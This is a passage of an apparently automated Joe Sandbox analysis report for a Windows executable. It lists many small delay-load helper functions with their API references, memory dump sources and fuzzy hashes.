                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 19f371445fa7af67776b83f9fa7a930dccd65d4fb339fd6d11916efaa75a9405
                                • Instruction ID: 3fd5b8ec4894a76c71e7afb97dad15f6bd798fe83a0568a2a7fde65c2e4fb5f3
                                • Opcode Fuzzy Hash: 19f371445fa7af67776b83f9fa7a930dccd65d4fb339fd6d11916efaa75a9405
                                • Instruction Fuzzy Hash: CEB0129126C2026C320971147D03E36167DCCC1B20331C01FF54FD12C0F5409C084432
                                Function 00D7DAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 7c886185af3054a701187734c85f1f1b6565063f35082e78b00c182790c3cd28
                                • Instruction ID: 425e4f52d10ea182e07de1c16309ecb5b4fa23cb50dce7c9309f15b5f80057fb
                                • Opcode Fuzzy Hash: 7c886185af3054a701187734c85f1f1b6565063f35082e78b00c182790c3cd28
                                • Instruction Fuzzy Hash: 6FB0129126C0026C320871057E03F3E126EDDC4B20330C52FF00FC1144F8448C0D5431
                                Function 00D7DACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: b083ec4f12306f5974e2c864345421def94e665dedb3543094808163fc9f0b79
                                • Instruction ID: 791791de184434ea9fc46c0c34d5796cfc70be29561b95e828bb9700e74d8e60
                                • Opcode Fuzzy Hash: b083ec4f12306f5974e2c864345421def94e665dedb3543094808163fc9f0b79
                                • Instruction Fuzzy Hash: 95B012A226C102AC32087105BE03E3A126DCDC0B20330C11FF44FC1144F4488C085431
                                Function 00D7DBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 8efff3ed2d4f003ee1f50bef55acf193d211a6814773999ab49709c3cd15d865
                                • Instruction ID: b5fa89fa7e3a18d9eb34c023e6a550f154ff33004e222bedece224773f1b39ea
                                • Opcode Fuzzy Hash: 8efff3ed2d4f003ee1f50bef55acf193d211a6814773999ab49709c3cd15d865
                                • Instruction Fuzzy Hash: 3DB0929526C0026D220861142907E36223ED880B20321802FB00EC1140A9408C099031
                                Function 00D7DBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 0e84b1d713b0c744031e0cc3a7827f802c819dfb7d85fdfee34ab13ea8a49be3
                                • Instruction ID: edf5d0a094b3638d0fd460bbf4c3e91741024b17bf8aab8398e6d8b9aee3ef46
                                • Opcode Fuzzy Hash: 0e84b1d713b0c744031e0cc3a7827f802c819dfb7d85fdfee34ab13ea8a49be3
                                • Instruction Fuzzy Hash: 50B0929526C1066D220811002D07D36223ED880B20321822FB00E90040A9408C489031
                                Function 00D7DBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 27bceade0eb06da74272bbac1c220392376dcdb85b6e2ce008800546cf4751a3
                                • Instruction ID: 4025da67312c593f7d381bd3aa07bfa54e7a3d79a4c5df0a5cae3ad06867dfb4
                                • Opcode Fuzzy Hash: 27bceade0eb06da74272bbac1c220392376dcdb85b6e2ce008800546cf4751a3
                                • Instruction Fuzzy Hash: 94B0129536C0436D320C51043E07E37233ECCC0B20331C11FF10EC1140F9808C099031
                                Function 00D7DBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 0f942bd0ca81b08466cc7394859f2a85500f60751a27a878bf86da9091b0caaf
                                • Instruction ID: df98ce7c7fe28b317bbb8092579870707dddb0d41890c3d233e0347f22d00cec
                                • Opcode Fuzzy Hash: 0f942bd0ca81b08466cc7394859f2a85500f60751a27a878bf86da9091b0caaf
                                • Instruction Fuzzy Hash: A8B0129536C103AD320C51043D07E37223ECCC0B20331C11FF40EC2140F9408C0C9031
                                Function 00D7DB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 9863f028ad79830540f4b15ab7d7e98ef159e9a56a2ef8cffc2263b8913e3b77
                                • Instruction ID: df7366d306a2b16ccad13115186cfc401355a8a6fcf7f669d030a25b460a51b1
                                • Opcode Fuzzy Hash: 9863f028ad79830540f4b15ab7d7e98ef159e9a56a2ef8cffc2263b8913e3b77
                                • Instruction Fuzzy Hash: 22B012D12AC1026C320871457E03F3B126EEDC0B20330C11FF40FC1144F8448C085531
                                Function 00D7DC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DC36
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: e0a18959e66248f0e09ce3deeefb02f3191706c06e006821e421c14a514ff954
                                • Instruction ID: b0ecf3ea35b1c5b10cda06acc0e4ab1dd38c2c42f0fdac3be57544ad50380d31
                                • Opcode Fuzzy Hash: e0a18959e66248f0e09ce3deeefb02f3191706c06e006821e421c14a514ff954
                                • Instruction Fuzzy Hash: 86B0129526C302AD320C61047D03E36123DCCC8F20335C51FF50ED1140F580AC084431
                                Function 00D7DC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DC36
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: f731a2a9e80cb6567b05ac968d7b129f7e0caea192543775a5592b2dbd46260b
                                • Instruction ID: 957a858cd452b4f9721ea89e7588a8c0f3510b5c1df8a40182a149b223306f70
                                • Opcode Fuzzy Hash: f731a2a9e80cb6567b05ac968d7b129f7e0caea192543775a5592b2dbd46260b
                                • Instruction Fuzzy Hash: 29B0129527C302AD320C61047D03E36123DCCC4F20334C51FF10ED1140F980AC084431
                                Function 00D7DC24 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DC36
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: d6781375a9b92d7dcf8502a681de5d2e1810de029fac71bcfc1919fc621c4149
                                • Instruction ID: a01f909225eb793e44d7e98860adb84f7cb1c8dcc4ecbf14a34575b5c53b5b44
                                • Opcode Fuzzy Hash: d6781375a9b92d7dcf8502a681de5d2e1810de029fac71bcfc1919fc621c4149
                                • Instruction Fuzzy Hash: C2B0129526C302BD320C21007F03D36523ECDC4F20335C61FF10EE0040B580AC485431
                                Function 00D7D8D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: de5064f1482eb11e318654cf95236964b94d570969fb30e4258626113147b028
                                • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                                • Opcode Fuzzy Hash: de5064f1482eb11e318654cf95236964b94d570969fb30e4258626113147b028
                                • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                                Function 00D7D997 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: b11b6f3207f5ad032fc619a2660d2d9488d6af45ab260af0da9b08fda588c972
                                • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                                • Opcode Fuzzy Hash: b11b6f3207f5ad032fc619a2660d2d9488d6af45ab260af0da9b08fda588c972
                                • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                                Function 00D7D983 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: efc44e7fe19eb225e8dc3098ad2cc25ea8804a2ed9152360ade98030c7b33121
                                • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                                • Opcode Fuzzy Hash: efc44e7fe19eb225e8dc3098ad2cc25ea8804a2ed9152360ade98030c7b33121
                                • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                                Function 00D7D98D Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 41496a5453383a85c079acf60d99b5650fc88fbff7a246d9d040fe69e86f65d1
                                • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                                • Opcode Fuzzy Hash: 41496a5453383a85c079acf60d99b5650fc88fbff7a246d9d040fe69e86f65d1
                                • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                                Function 00D7D951 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                Download Yara Rule
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
